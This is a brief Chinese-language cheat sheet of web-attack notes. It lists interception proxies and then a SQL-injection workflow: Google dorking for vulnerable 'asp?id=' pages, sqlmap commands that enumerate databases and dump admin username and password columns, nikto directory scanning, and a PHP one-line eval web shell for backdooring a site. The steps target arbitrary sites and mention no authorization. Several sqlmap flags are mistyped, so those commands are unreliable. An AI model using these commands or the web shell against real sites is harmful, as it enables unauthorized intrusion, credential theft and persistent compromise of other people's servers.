#代理拦截工具
mitmproxy -p 8800 #配置代理
owasp-zap (攻击代理 ZAP) 是一款查找网页应用程序漏洞的综合类渗透测试工具
包包含了拦截代理、自动代理、被动处理、暴力破解、端口扫描以及蜘蛛搜索等功能。
burp suite 是用于攻击web应用程序的集成平台
代理 burp Suite带有一个代理 通过默认端口8080上运行,使用这个代理
proxyStrike v2.1 代理工具
webscarab 代理软件 包括http代理,网络爬行、网络蜘蛛,会话ID分析,自动脚本接口,模糊测试工具,
web格式的编码/解码,WEB服务描述语言和SOAP解析器等功能模块。webScarab基于GNU协议,使用JAVA编写,是WEBGoat中所使用的工具之一
通过google hack 寻找测试目标:
搜索 -》 公司 inurl:asp?id=
1.测试数字型注入点
2.sqlmap拆解数据库和表名
3.dump表数据
4.登陆后台
'
读取数据库版本,当前用户,当前数据库
sqlmap -u 网址 -f -b -current-dbs -curent-user -v 1
sqlmap -u 网址 --tables #列出可能攻击的表
sqlmap -u 网址 -T uname --columns #列出有用的列
sqlmap -u 网址 -T uname - C login_name,pass,username --dump #-C 指定要找的列、 --dump
一个PHP站点的sql注入:
1.测试数字型注入点
2.Sqlmap拆解数据库和表名
3.dump 表数据
4.利用nikto帮助寻找隐藏目录
5.利用网页代码中的隐藏信息寻找管理后台
sqlmap -u 网址 --dbs --current-user
sqlmap -u 网址 --dbs --dbms mysql -D cmxt --tables #cmxt 是数据库
sqlmap -u 网址 --dbs --dbms mysql --tables #不指定数据库
sqlmap -u 网址 --dbs --dbms mysql -T admin -columns #查看列结果
sqlmap -u 网址 --dbs --dbms mysql -T admin -C user,pwd --dump #查询具体列的值
nikto -host 主域名 #查看网站的对应的目录 检存在的漏洞。
fiddler :autoresponser 返回相应网页。来提权。
<?php eval($_POST[x]);?> 一句话密码